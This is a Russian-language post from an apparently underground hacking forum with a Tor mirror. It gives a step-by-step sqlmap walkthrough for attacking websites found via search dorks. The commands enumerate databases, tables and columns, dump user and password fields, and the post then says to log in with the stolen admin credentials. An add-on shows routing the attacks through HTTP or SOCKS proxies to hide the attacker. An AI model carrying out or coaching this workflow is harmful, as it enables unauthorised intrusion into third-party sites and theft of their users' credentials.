SqlMap Guide

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Good.txt

Участник

Good.txt

Участник
5 Ноя 2016
38
17
Представленная ниже инфа была составлена SlipX'ом, заливаю ее в дополнение к своему видеогайду, плюс мои дополнения. Я думаю SlipX не расстроится, что я добавил его тему))
Для работы с sqlmap на понадобится
sqlmap - качаем:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Python2.7 -
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Скачиваем последний версию с sqlmap.org
Распаковываем архив и закидываем туда cmd.exe
(идем в папку c:\windows\system32 там файл cmd.exe копируем его в папку sqlmapml)

sqlmap - GET метод

Для начала нам нужна дорка, как только нашли дорку открываем sqlmap и пишем

Код:
sqlmap.py -u "
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
"


sqlmap будет обнаруживать уязвимость вашей дорки и скажет вам какой тип уязвимости и тип базы данных, если цель уязвима переходим к следующему шагу.

Находим database name
Через эту команду находим имя базы данных
Код:
sqlmap.py -u "
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
" --dbs

Тут sqlmap найдет database name нашей цели, к примеру "web_db"


Находим tables name
После того как sqlmap нашел имя базы данных,ищем tables name.
Через эту команду находим название таблиц
Код:
sqlmap.py -u "
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
" -D web_db --tables

Это покажет таблици в "web_db" базе данных , к примеру "tbl_admin"


Находим columns name
Находим что внутри "tbl_admin" от "web_db" и это будут наши columns. Через эту команду находим columns type
Код:
sqlmap.py -u "
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
" -D web_db -T tbl_admin --columns

Это покажет нам список названий столбцов, к примеру "user" и "password"


Дамп/dump
Эта команда сдампит все что есть в столбцах
Код:
sqlmap.py -u "
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
" -D web_db -T tbl_admin -C user,password --dump

И тут мы находим "user = admin" и "password = adminpass".
Идем на сайт и заходим

Инфу нашел в инете и перевел

Так же можно и так: (меня пытались научить^^)(но мыл не было)

Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --technique=BEU
sqlmap.py - это запуск самой программы
-u - цель
--random-agent - это скульмап берет произвольный user-agent из своей базы
--thread 10 это количество одновременных потоков минимум 1 максимум 10
--technique=BEU - техника эксплуатации Blind,Union,Error

Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --current-user --current-db --privileges
--current-user - пользователь БД
--current-db - база с которой работаем

Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --dbs
проверям к каким базам данных у нас есть доступ

покажет так:
available databases [2]:[*] имя[*] имя
(может быть одна или больше баз)

Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --count -D имя
Сейчас скульмап даст таблицы в базе данных "имя" и сколько записей в каждой таблице
к примеру:
Database: имя
+-------------+---------+
| Table | Entries |
+-------------+---------+
| ASIGNALOGO | 420 |
| NOTAS | 411 |
| FOTOS | 342 |
| POBLACIONES | 28 |
| LOGOS | 7 |
+-------------+---------+
теперь можно посмотреть колонки в интересующей нас таблице
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --columns -T LOGOS -D имя
Database: имя
Table: LOGOS
[4 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| CODIGO | int(5) |
| DESCRIPCION | varchar(200) |
| FICHERO | varchar(40) |
| NOMBRE | varchar(120) |
+-------------+--------------+
либо можно во всех таблицах
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --columns -D имя
Теперь дампим нужную таблицу
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --dump -T LOGOS -D имя
дамп таблиц будет лежать в папке dump того сайта с которым мы работаем, он будет в формате .CSV открывать можно OFFICE'ом или текстовым редактором

Мой первый гайд так что тапками не кидаться (+ сам еще толком не вьехал в прогу)

BY SlipX

Addon by Shigeo:
Немного дополню: вы можете использовать прокси при использовании данной программы для этого необходимо дописывать параметр:
Код:
--proxy=
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, где 255.255.255.255:8080 это наша прокся, а http:// тип прокси.
В качестве типа прокси может также выступать socks4/5. В таком случае наш параметр будет выглядеть следующим образом:
Код:
--proxy=socks5://255.255.255.255:8080, где 255.255.255.255:8080 это наша прокся, а socks5// тип прокси.

Пример использования:
Код:
sqlmap.py -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--proxy=
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

И так далее во всех операциях:
Код:
sqlmap.py -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--proxy=
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--dbs
Код:
sqlmap.py -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--proxy=
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--dbs
Код:
sqlmap.py -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--proxy=
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
-D web_db --tables
Для новичков можно использовать --wizard он облегчит вам работу.
Значит так:
Код:
sqlmap.py --wizard
дальше следуем по инструкции нажимаем циферки 1 или 2
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя